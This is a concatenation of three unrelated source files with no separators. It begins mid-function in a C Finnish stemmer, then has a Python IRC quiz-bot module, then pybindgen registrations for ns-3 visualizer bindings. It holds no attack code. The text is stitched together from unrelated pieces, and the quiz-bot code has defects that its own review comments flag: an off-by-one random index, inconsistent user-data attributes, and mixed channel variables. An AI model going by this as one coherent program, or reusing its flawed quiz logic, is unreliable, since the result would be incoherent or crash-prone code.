    ((SN_local *)z)->b_ending_removed = 0;
    /* switch to backward (right-to-left) mode */
    z->lb = z->c; z->c = z->l;
    {
        int v_2 = z->l - z->c;
        {
            int ret = r_particle_etc(z);
            if (ret < 0) return ret;
        }
        z->c = z->l - v_2;
    }
    {
        int v_3 = z->l - z->c;
        {
            int ret = r_possessive(z);
            if (ret < 0) return ret;
        }
        z->c = z->l - v_3;
    }
    {
        int v_4 = z->l - z->c;
        {
            int ret = r_case_ending(z);
            if (ret < 0) return ret;
        }
        z->c = z->l - v_4;
    }
    {
        int v_5 = z->l - z->c;
        {
            int ret = r_other_endings(z);
            if (ret < 0) return ret;
        }
        z->c = z->l - v_5;
    }
    /* i_plural only after a removed case ending; t_plural otherwise */
    do {
        if (!((SN_local *)z)->b_ending_removed) goto lab0;
        {
            int v_6 = z->l - z->c;
            {
                int ret = r_i_plural(z);
                if (ret < 0) return ret;
            }
            z->c = z->l - v_6;
        }
        break;
    lab0:
        {
            int v_7 = z->l - z->c;
            {
                int ret = r_t_plural(z);
                if (ret < 0) return ret;
            }
            z->c = z->l - v_7;
        }
    } while (0);
    {
        int v_8 = z->l - z->c;
        {
            int ret = r_tidy(z);
            if (ret < 0) return ret;
        }
        z->c = z->l - v_8;
    }
    /* restore forward mode */
    z->c = z->lb;
    return 1;
}
/* Allocate and initialize a stemmer environment; returns NULL on failure
 * (including failure to allocate the s_x scratch buffer, in which case the
 * partially built environment is released). */
extern struct SN_env * finnish_ISO_8859_1_create_env(void) {
    struct SN_env * z = SN_new_env(sizeof(SN_local));
    if (z) {
        ((SN_local *)z)->b_ending_removed = 0;
        ((SN_local *)z)->s_x = NULL;
        ((SN_local *)z)->i_p2 = 0;
        ((SN_local *)z)->i_p1 = 0;
        if ((((SN_local *)z)->s_x = create_s()) == NULL) {
            finnish_ISO_8859_1_close_env(z);
            return NULL;
        }
    }
    return z;
}
/* Release the scratch buffer and the environment; safe to call with NULL. */
extern void finnish_ISO_8859_1_close_env(struct SN_env * z) {
    if (z) {
        lose_s(((SN_local *)z)->s_x);
    }
    SN_delete_env(z);
}
import os
import json
import time
import re
import random
from modules import userDatabase
class CaseInsensitiveDict(dict):
    """A dict whose string keys compare case-insensitively.

    Keys are normalized to lower case on write, and every overridden
    lookup lowers the requested key before delegating to ``dict``.
    Only the operations overridden here normalize their key: plain
    ``dict`` methods such as ``update`` or the constructor bypass the
    lowering, so populate instances through item assignment.
    """

    def __contains__(self, key):
        return dict.__contains__(self, key.lower())

    def __getitem__(self, key):
        return dict.__getitem__(self, key.lower())

    def __setitem__(self, key, value):
        return dict.__setitem__(self, key.lower(), value)

    def __delitem__(self, key):
        # Fix: deletion previously used the raw key, so `del d['Foo']`
        # raised KeyError for an entry stored under 'foo'.
        return dict.__delitem__(self, key.lower())

    def get(self, key, default=None):
        # Fix: `.get` previously bypassed the lowering and could miss
        # entries that `d[key]` found.
        return dict.get(self, key.lower(), default)
# Transient per-channel state for rounds currently in progress (keyed by
# channel name, case-insensitively).
tmp_quiz_data = CaseInsensitiveDict()
# Persisted question database; mirrored to ./resources/quiz.dat.
quiz_data = {'questions': list()}
# Shape of one entry in quiz_data['questions']:
# quizData = { "questions" : [{ "question" : cmd[1],
# "answers" : [ cmd[3] ],
# "bestTime" : [ "" , 0.0 ],
# "answeredCorrect" : 0,
# "answeredIncorrect" : 0,
# "answeredCorrectMessage" : "",
# "showAnswers" : True,
#
# "timePeriod" : float(cmd[2]),
# "creator" : sender[0],
# "createdTime" : time.time()
# } ]}
def save_quiz_database():
    """Serialize the module-level ``quiz_data`` to ./resources/quiz.dat."""
    # `with` guarantees the handle is closed even if json.dump raises
    # part-way through (the original leaked the handle on error).
    with open('./resources/quiz.dat', 'w') as file:
        json.dump(quiz_data, file)
def load_quiz_database():
    """Load ./resources/quiz.dat into the module-level ``quiz_data``.

    Returns the loaded data as well, so callers can use the result
    directly instead of reaching for the global (the original returned
    None, so returning the data is backward-compatible).
    """
    global quiz_data
    # `with` guarantees the handle is closed even if json.load raises.
    with open('./resources/quiz.dat', 'r') as file:
        quiz_data = json.load(file)
    return quiz_data
def on_init(irc):
    """Load the persisted question set on startup, creating an empty
    database file the first time the bot runs."""
    if not os.path.isfile("./resources/quiz.dat"):
        save_quiz_database()
    else:
        load_quiz_database()
def on_process_forever(bot):
    """Expire active quiz rounds whose time period has elapsed.

    Called periodically by the bot's main loop.  For every channel whose
    active round ran past its ``timePeriod``, announce the result,
    persist the question database and drop the round's transient state.
    """
    current_time = time.time()
    # Fix: iterate over a snapshot of the keys.  The original deleted from
    # tmp_quiz_data while iterating it and then fell through to the next
    # iteration, which raises RuntimeError ("dictionary changed size
    # during iteration") as soon as one round expires while another
    # round is still pending.
    for channel in list(tmp_quiz_data):
        round_state = tmp_quiz_data[channel]
        if not round_state['isActive']:
            continue
        time_difference = current_time - round_state["startTime"]
        if time_difference < round_state["timePeriod"]:
            continue
        # More than one registered player means everyone who tried
        # guessed wrong (a correct guess ends the round immediately).
        if len(round_state["players"].keys()) > 1:
            bot.send_private_message(channel, '5Quiz automatically finished - No one got the right answer.')
        else:
            bot.send_private_message(channel, '5Quiz automatically finished - Time in the round ended.')
        save_quiz_database()
        del tmp_quiz_data[channel]
    return
def on_channel_pm(irc, user_mask, user, channel, message):
    """Handle a channel message: first treat it as a possible quiz answer,
    then dispatch the !quiz family of commands.

    NOTE(review): several inconsistent lookups are flagged inline below;
    this handler should be audited before any refactor.
    """
    global tmp_quiz_data, quiz_data
    command = message.split()
    # Pass 1: check the message against every active round's answer set.
    for chan in tmp_quiz_data:
        if message.lower() in tmp_quiz_data[chan]["wrongAnswers"] or message.lower() == tmp_quiz_data[chan]["rightAnswer"]:
            if user.lower() not in tmp_quiz_data[chan]['players']:
                tmp_quiz_data[chan]['players'][user.lower()] = 0
            # A player may attempt only once per round: the counter stays 0
            # until they guess wrong.
            if tmp_quiz_data[chan]['players'][user.lower()] == 0:
                if message.lower() == tmp_quiz_data[chan]["rightAnswer"].lower():
                    real_time_secs = time.time()
                    # NOTE(review): other branches use irc.user_info; confirm
                    # irc.userData refers to the same store.
                    irc.userData[user.lower()]["quiz"]["correct"] += 1
                    userDatabase.save_user_database(irc)
                    irc.send_private_message(channel,
                                             '3Congrats 1' + user + ', 3You have correctly answered the question.')
                    # NOTE(review): indexes by `channel` while iterating
                    # `chan`; with multiple active rounds this may read the
                    # wrong round's question id.
                    quiz_id = tmp_quiz_data[channel.lower()]['id']
                    # New best time only if strictly faster than the stored
                    # one; a fresh question (bestTime == ["", 0.0]) is
                    # handled by the elif below.
                    if round(real_time_secs - tmp_quiz_data[chan]["startTime"], 2) < \
                            quiz_data["questions"][quiz_id]["bestTime"][1]:
                        time_dif = quiz_data["questions"][quiz_id]["bestTime"][1] - (
                            real_time_secs - tmp_quiz_data[chan]["startTime"])
                        quiz_data["questions"][quiz_id]["bestTime"][1] = round(
                            real_time_secs - tmp_quiz_data[chan]["startTime"], 2)
                        quiz_data["questions"][quiz_id]["bestTime"][0] = user
                        irc.send_private_message(channel, user + '3 has just set the new best time of ' + str(
                            quiz_data["questions"][quiz_id]["bestTime"][
                                1]) + ' 3secs. ' + user + ' 3beat the old best time by ' + str(
                            round(time_dif, 2)) + ' 3secs.')
                    elif quiz_data["questions"][quiz_id]["bestTime"][0] == "":
                        quiz_data["questions"][quiz_id]["bestTime"][1] = round(
                            real_time_secs - tmp_quiz_data[chan]["startTime"], 2)
                        quiz_data["questions"][quiz_id]["bestTime"][0] = user
                        irc.send_private_message(channel, user + '3 has just set the new best time of ' + str(
                            quiz_data["questions"][quiz_id]["bestTime"][1]) + ' 3secs.')
                    quiz_data["questions"][quiz_id]["answeredCorrect"] += 1
                    save_quiz_database()
                    # Round over: drop its transient state.
                    del tmp_quiz_data[chan]
                else:
                    # NOTE(review): same `channel` vs `chan` mixing as above.
                    quiz_id = tmp_quiz_data[channel.lower()]['id']
                    irc.send_private_message(channel,
                                             '5Sorry 1' + user + ', 5that is the wrong answer. You cannot attempt anymore for this round.')
                    tmp_quiz_data[chan]["players"][user.lower()] += 1
                    quiz_data["questions"][quiz_id]["answeredIncorrect"] += 1
                    # NOTE(review): irc.user_info here but irc.userData on the
                    # next line — confirm which attribute is canonical.
                    irc.user_info[user.lower()]["quiz"]["incorrect"] += 1
                irc.userData[user.lower()]["quiz"]["participated"] += 1
                userDatabase.save_user_database(irc)
            return
    # Pass 2: command dispatch.
    if command[0].lower() == '!quizhelp':
        irc.send_private_message(channel,
                                 user + ', basically you get given a multi-choice question and your job is to carefully type in what you think is the right answer before the time runs out and before any other IRC users guess the right answer. You can only guess once, so double check that you are right. So what are you waiting for? start a !quiz.')
    elif command[0].lower() == '!quiz':
        if len(quiz_data['questions']) == 0:
            irc.send_private_message(channel, '5ERROR: No quiz questions in database.')
            return
        #if len(quiz_data['questions']) in range(0, 10):
        #    irc.send_private_message(channel,
        #                             '5ERROR: There are only a few quiz questions in database. Until more are added, the quiz will be unavailable.')
        #    return
        # Only one active round per channel.
        if channel in tmp_quiz_data:
            return
        # NOTE(review): randint's upper bound is inclusive, so this can
        # return len(questions) and raise IndexError below; should be
        # randint(0, len-1) or random.randrange(len).
        random_quiz_id = random.randint(0, len(quiz_data['questions']))
        # print quizQuestionID
        # print "creating tmp data"
        # Build the transient round state for this channel.
        tmp_quiz_data[channel] = dict()
        tmp_quiz_data[channel]['isActive'] = False
        tmp_quiz_data[channel]["numOfPlayers"] = 0
        tmp_quiz_data[channel]["players"] = {}
        tmp_quiz_data[channel]["timePeriod"] = float(quiz_data['questions'][random_quiz_id]["timePeriod"])
        # Convention: answers[0] is the correct answer, the rest are wrong.
        tmp_quiz_data[channel]["rightAnswer"] = quiz_data['questions'][random_quiz_id]['answers'][0].lower()
        tmp_quiz_data[channel]["wrongAnswers"] = []
        for i in range(1, len(quiz_data['questions'][random_quiz_id]['answers'])):
            tmp_quiz_data[channel]["wrongAnswers"].append(quiz_data['questions'][random_quiz_id]['answers'][i].lower())
        tmp_quiz_data[channel]["startTime"] = round(time.time(), 1)
        tmp_quiz_data[channel]['id'] = random_quiz_id
        # print "creating tmp data (part 2)"
        # Shuffle the displayed answers so the right one isn't always first.
        quiz_answers = quiz_data['questions'][random_quiz_id]['answers']
        quiz_answers = sorted(quiz_answers, key=lambda k: random.random())
        tmp_quiz_data[channel.lower()]['isActive'] = True
        irc.send_private_message(channel, '6Question: "' + str(
            quiz_data['questions'][random_quiz_id]["question"]) + '" 6Answers: ' + str(quiz_answers).strip(
            '[]') + '.')
        if quiz_data['questions'][random_quiz_id]["bestTime"][0] != "":
            irc.send_private_message(channel,
                                     '\u00036Best time set by\u0003 {0} \u00036in\u0003 {1} \u00036secs.'.format(
                                         str(quiz_data['questions'][random_quiz_id]["bestTime"][0]),
                                         str(quiz_data['questions'][random_quiz_id]["bestTime"][1])))
    elif command[0].lower() == '!numberofquizquestions':
        irc.send_private_message(channel,
                                 "There are " + str(len(quiz_data['questions'])) + " questions in the Quiz database.")
    elif command[0].lower() == '!createquizquestion' or command[0].lower() == '!cqq':
        # Question creation is restricted to privileged users.
        if irc.user_info[user.lower()]["access_level"] >= 1:
            question_re = re.compile("!c(?:(?:reate)?)q(?:(?:uiz)?)q(?:(?:uestion)?)\s(.*\?)\s([0-9]+[0-9]?)\s(.*)",
                                     re.IGNORECASE)
            match = question_re.match(message)
            if match:
                command_params = question_re.findall(message)[0]
                print(command_params)
                question = command_params[0]
                time_period = command_params[1]
                answer_str = command_params[2]
                # Answers must be supplied as double-quoted strings.
                if re.match('"([\w\s]*)"', answer_str):
                    answers = re.findall('"([\w\s]*)"', answer_str)
                else:
                    irc.send_private_message(channel, "USAGE: !c[reate]q[uiz]q[uestion] (Question)? "
                                                      "(Question Time Period (in Secs)) \"(Correct Answer)\" "
                                                      "\"(Wrong Answer)\" [\"(Wrong Answer)\" \"(...)\"]")
                    irc.send_private_message(channel, "EXAMPLE: !cqq 1 + 1 = ? 2 1 3 4 5")
                    return
                if int(time_period) < 5 or int(time_period) > 60:
                    irc.send_private_message(channel,
                                             '5ERROR: The time period is not pratical. Set a more appropriate time period (between 5 - 60 seconds).')
                    return
                # Reject duplicate questions (case-insensitive).
                for question_data in quiz_data['questions']:
                    if question_data['question'].lower() == question.lower():
                        irc.send_private_message(channel, '5ERROR: The question has already been created.')
                        return
                question_data = {"question": question,
                                 "answers": [],
                                 "bestTime": ["", 0.0],
                                 "answeredCorrect": 0,
                                 "answeredIncorrect": 0,
                                 "answeredCorrectMessage": "",
                                 "showAnswers": True,
                                 "timePeriod": float(time_period),
                                 "creator": user,
                                 "createdTime": time.time()
                                 }
                for i in range(0, len(answers)):
                    question_data['answers'].append(answers[i])
                quiz_data['questions'].append(question_data)
                save_quiz_database()
                irc.send_private_message(channel, '3SUCCESS: Quiz Question, "' + question + '" (ID: ' + str(
                    len(quiz_data['questions']) - 1) + ') has been added into the quiz database.')
            else:
                irc.send_private_message(channel, "USAGE: !c[reate]q[uiz]q[uestion] (Question)? "
                                                  "(Question Time Period (in Secs)) \"(Correct Answer)\" "
                                                  "\"(Wrong Answer)\" [\"(Wrong Answer)\" \"(...)\"]")
                irc.send_private_message(channel, "EXAMPLE: !cqq 1 + 1 = ? 2 1 3 4 5")
from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers
import pybindgen.settings
import warnings
class ErrorHandler(pybindgen.settings.ErrorHandler):
    """Downgrade wrapper-generation failures to warnings."""

    def handle_error(self, wrapper, exception, traceback_):
        # Returning True tells pybindgen the error was handled, so code
        # generation continues with the remaining wrappers.
        report = "exception %r in wrapper %s" % (exception, wrapper)
        warnings.warn(report)
        return True


# Install the tolerant handler globally for this generation run.
pybindgen.settings.error_handler = ErrorHandler()
import sys
def module_init():
    """Create the root pybindgen Module for the ns-3 visualizer bindings."""
    return Module('ns.visualizer', cpp_namespace='::ns3')
def register_types(module):
    """Register every C++ type wrapped by the ns.visualizer bindings.

    Generated by pybindgen's API scanner — do not reorder by hand:
    declaration order is load-bearing, since a class must already be
    registered before it can be referenced as the ``parent`` or
    ``outer_class`` of a later registration.
    """
    root_module = module.get_root()
    ## address.h (module 'network'): ns3::Address [class]
    module.add_class('Address', import_from_module='ns.network')
    ## address.h (module 'network'): ns3::Address::MaxSize_e [enumeration]
    module.add_enum('MaxSize_e', ['MAX_SIZE'], outer_class=root_module['ns3::Address'], import_from_module='ns.network')
    ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList [class]
    module.add_class('AttributeConstructionList', import_from_module='ns.core')
    ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item [struct]
    module.add_class('Item', import_from_module='ns.core', outer_class=root_module['ns3::AttributeConstructionList'])
    ## buffer.h (module 'network'): ns3::Buffer [class]
    module.add_class('Buffer', import_from_module='ns.network')
    ## buffer.h (module 'network'): ns3::Buffer::Iterator [class]
    module.add_class('Iterator', import_from_module='ns.network', outer_class=root_module['ns3::Buffer'])
    ## packet.h (module 'network'): ns3::ByteTagIterator [class]
    module.add_class('ByteTagIterator', import_from_module='ns.network')
    ## packet.h (module 'network'): ns3::ByteTagIterator::Item [class]
    module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagIterator'])
    ## byte-tag-list.h (module 'network'): ns3::ByteTagList [class]
    module.add_class('ByteTagList', import_from_module='ns.network')
    ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator [class]
    module.add_class('Iterator', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagList'])
    ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item [struct]
    module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagList::Iterator'])
    ## callback.h (module 'core'): ns3::CallbackBase [class]
    module.add_class('CallbackBase', import_from_module='ns.core')
    ## event-id.h (module 'core'): ns3::EventId [class]
    module.add_class('EventId', import_from_module='ns.core')
    ## ipv4-address.h (module 'network'): ns3::Ipv4Address [class]
    module.add_class('Ipv4Address', import_from_module='ns.network')
    ## ipv4-address.h (module 'network'): ns3::Ipv4Address [class]
    root_module['ns3::Ipv4Address'].implicitly_converts_to(root_module['ns3::Address'])
    ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress [class]
    module.add_class('Ipv4InterfaceAddress', import_from_module='ns.internet')
    ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e [enumeration]
    module.add_enum('InterfaceAddressScope_e', ['HOST', 'LINK', 'GLOBAL'], outer_class=root_module['ns3::Ipv4InterfaceAddress'], import_from_module='ns.internet')
    ## ipv4-address.h (module 'network'): ns3::Ipv4Mask [class]
    module.add_class('Ipv4Mask', import_from_module='ns.network')
    ## ipv6-address.h (module 'network'): ns3::Ipv6Address [class]
    module.add_class('Ipv6Address', import_from_module='ns.network')
    ## ipv6-address.h (module 'network'): ns3::Ipv6Address [class]
    root_module['ns3::Ipv6Address'].implicitly_converts_to(root_module['ns3::Address'])
    ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix [class]
    module.add_class('Ipv6Prefix', import_from_module='ns.network')
    ## mac48-address.h (module 'network'): ns3::Mac48Address [class]
    module.add_class('Mac48Address', import_from_module='ns.network')
    ## mac48-address.h (module 'network'): ns3::Mac48Address [class]
    root_module['ns3::Mac48Address'].implicitly_converts_to(root_module['ns3::Address'])
    ## object-base.h (module 'core'): ns3::ObjectBase [class]
    module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core')
    ## object.h (module 'core'): ns3::ObjectDeleter [struct]
    module.add_class('ObjectDeleter', import_from_module='ns.core')
    ## object-factory.h (module 'core'): ns3::ObjectFactory [class]
    module.add_class('ObjectFactory', import_from_module='ns.core')
    ## packet-metadata.h (module 'network'): ns3::PacketMetadata [class]
    module.add_class('PacketMetadata', import_from_module='ns.network')
    ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [struct]
    module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::PacketMetadata'])
    ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [enumeration]
    module.add_enum('', ['PAYLOAD', 'HEADER', 'TRAILER'], outer_class=root_module['ns3::PacketMetadata::Item'], import_from_module='ns.network')
    ## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator [class]
    module.add_class('ItemIterator', import_from_module='ns.network', outer_class=root_module['ns3::PacketMetadata'])
    ## packet.h (module 'network'): ns3::PacketTagIterator [class]
    module.add_class('PacketTagIterator', import_from_module='ns.network')
    ## packet.h (module 'network'): ns3::PacketTagIterator::Item [class]
    module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::PacketTagIterator'])
    ## packet-tag-list.h (module 'network'): ns3::PacketTagList [class]
    module.add_class('PacketTagList', import_from_module='ns.network')
    ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData [struct]
    module.add_class('TagData', import_from_module='ns.network', outer_class=root_module['ns3::PacketTagList'])
    ## pyviz.h (module 'visualizer'): ns3::PyViz [class]
    module.add_class('PyViz')
    ## pyviz.h (module 'visualizer'): ns3::PyViz::PacketCaptureMode [enumeration]
    module.add_enum('PacketCaptureMode', ['PACKET_CAPTURE_DISABLED', 'PACKET_CAPTURE_FILTER_HEADERS_OR', 'PACKET_CAPTURE_FILTER_HEADERS_AND'], outer_class=root_module['ns3::PyViz'])
    ## pyviz.h (module 'visualizer'): ns3::PyViz::LastPacketsSample [struct]
    module.add_class('LastPacketsSample', outer_class=root_module['ns3::PyViz'])
    ## pyviz.h (module 'visualizer'): ns3::PyViz::NetDeviceStatistics [struct]
    module.add_class('NetDeviceStatistics', outer_class=root_module['ns3::PyViz'])
    ## pyviz.h (module 'visualizer'): ns3::PyViz::NodeStatistics [struct]
    module.add_class('NodeStatistics', outer_class=root_module['ns3::PyViz'])
    ## pyviz.h (module 'visualizer'): ns3::PyViz::PacketCaptureOptions [struct]
    module.add_class('PacketCaptureOptions', outer_class=root_module['ns3::PyViz'])
    ## pyviz.h (module 'visualizer'): ns3::PyViz::PacketDropSample [struct]
    module.add_class('PacketDropSample', outer_class=root_module['ns3::PyViz'])
    ## pyviz.h (module 'visualizer'): ns3::PyViz::PacketSample [struct]
    module.add_class('PacketSample', outer_class=root_module['ns3::PyViz'])
    ## pyviz.h (module 'visualizer'): ns3::PyViz::RxPacketSample [struct]
    module.add_class('RxPacketSample', parent=root_module['ns3::PyViz::PacketSample'], outer_class=root_module['ns3::PyViz'])
    ## pyviz.h (module 'visualizer'): ns3::PyViz::TransmissionSample [struct]
    module.add_class('TransmissionSample', outer_class=root_module['ns3::PyViz'])
    ## pyviz.h (module 'visualizer'): ns3::PyViz::TxPacketSample [struct]
    module.add_class('TxPacketSample', parent=root_module['ns3::PyViz::PacketSample'], outer_class=root_module['ns3::PyViz'])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Object', 'ns3::ObjectBase', 'ns3::ObjectDeleter'], parent=root_module['ns3::ObjectBase'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simulator.h (module 'core'): ns3::Simulator [class]
    module.add_class('Simulator', destructor_visibility='private', import_from_module='ns.core')
    ## tag.h (module 'network'): ns3::Tag [class]
    module.add_class('Tag', import_from_module='ns.network', parent=root_module['ns3::ObjectBase'])
    ## tag-buffer.h (module 'network'): ns3::TagBuffer [class]
    module.add_class('TagBuffer', import_from_module='ns.network')
    ## type-id.h (module 'core'): ns3::TypeId [class]
    module.add_class('TypeId', import_from_module='ns.core')
    ## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration]
    module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core')
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct]
    module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
    ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct]
    module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
    ## empty.h (module 'core'): ns3::empty [class]
    module.add_class('empty', import_from_module='ns.core')
    ## int64x64-double.h (module 'core'): ns3::int64x64_t [class]
    module.add_class('int64x64_t', import_from_module='ns.core')
    ## chunk.h (module 'network'): ns3::Chunk [class]
    module.add_class('Chunk', import_from_module='ns.network', parent=root_module['ns3::ObjectBase'])
    ## header.h (module 'network'): ns3::Header [class]
    module.add_class('Header', import_from_module='ns.network', parent=root_module['ns3::Chunk'])
    ## ipv4-header.h (module 'internet'): ns3::Ipv4Header [class]
    module.add_class('Ipv4Header', import_from_module='ns.internet', parent=root_module['ns3::Header'])
    ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::DscpType [enumeration]
    module.add_enum('DscpType', ['DscpDefault', 'CS1', 'AF11', 'AF12', 'AF13', 'CS2', 'AF21', 'AF22', 'AF23', 'CS3', 'AF31', 'AF32', 'AF33', 'CS4', 'AF41', 'AF42', 'AF43', 'CS5', 'EF', 'CS6', 'CS7'], outer_class=root_module['ns3::Ipv4Header'], import_from_module='ns.internet')
    ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::EcnType [enumeration]
    module.add_enum('EcnType', ['NotECT', 'ECT1', 'ECT0', 'CE'], outer_class=root_module['ns3::Ipv4Header'], import_from_module='ns.internet')
    ## object.h (module 'core'): ns3::Object [class]
    module.add_class('Object', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
    ## object.h (module 'core'): ns3::Object::AggregateIterator [class]
    module.add_class('AggregateIterator', import_from_module='ns.core', outer_class=root_module['ns3::Object'])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::EventImpl', 'ns3::empty', 'ns3::DefaultDeleter<ns3::EventImpl>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Ipv4MulticastRoute', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Ipv4MulticastRoute>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Ipv4Route', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Ipv4Route>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::NixVector', 'ns3::empty', 'ns3::DefaultDeleter<ns3::NixVector>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::OutputStreamWrapper', 'ns3::empty', 'ns3::DefaultDeleter<ns3::OutputStreamWrapper>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Packet', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Packet>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## socket.h (module 'network'): ns3::Socket [class]
    module.add_class('Socket', import_from_module='ns.network', parent=root_module['ns3::Object'])
